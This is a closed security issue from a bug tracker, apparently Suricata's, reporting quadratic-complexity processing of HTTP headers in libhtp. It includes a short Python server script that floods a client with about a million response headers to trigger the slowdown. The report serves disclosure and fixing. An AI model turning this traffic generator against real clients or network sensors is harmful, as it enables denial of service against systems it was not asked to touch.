Project

General

Profile

Actions

Security #7191

closed

http: quadratic complexity in headers processing/finding

Added by Philippe Antoine 4 months ago. Updated about 2 months ago.

Status:
Closed
Priority:
Normal
Target version:
Affected Versions:
Label:
Git IDs:
Severity:
CRITICAL
Disclosure Date:

Description

Found while creating CTF challenge against curl CVE-2023-38039

Script to create traffic was

import socket

HOST = "127.0.0.1"  # Standard loopback interface address (localhost)
PORT = 8001  # Port to listen on (non-privileged ports are > 1023)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen()
    conn, addr = s.accept()
    with conn:
        print(f"Connected by {addr}")
        while True:
            data = conn.recv(1024)
            if not data:
                break
            conn.sendall(b"HTTP/1.1 200 OK\n")
            for i in range(1024*1024):
                conn.sendall(b"Name%d: value%d\n" % (i, i))

Most time is spent in htp_process_response_header_generic. doing the htp_table_get


Files

curlinf.pcapng (24.1 MB) curlinf.pcapng Philippe Antoine, 07/31/2024 09:47 AM
curlinf2.pcapng (2.14 MB) curlinf2.pcapng Philippe Antoine, 07/31/2024 09:50 AM

Subtasks 1 (0 open1 closed)

Security #7192: http: quadratic complexity in headers processing/finding (7.0.x backport)ClosedPhilippe AntoineActions

Related issues 1 (0 open1 closed)

Related to Suricata - Task #7246: libhtp 0.5.49ClosedVictor JulienActions
Actions

Also available in: Atom PDF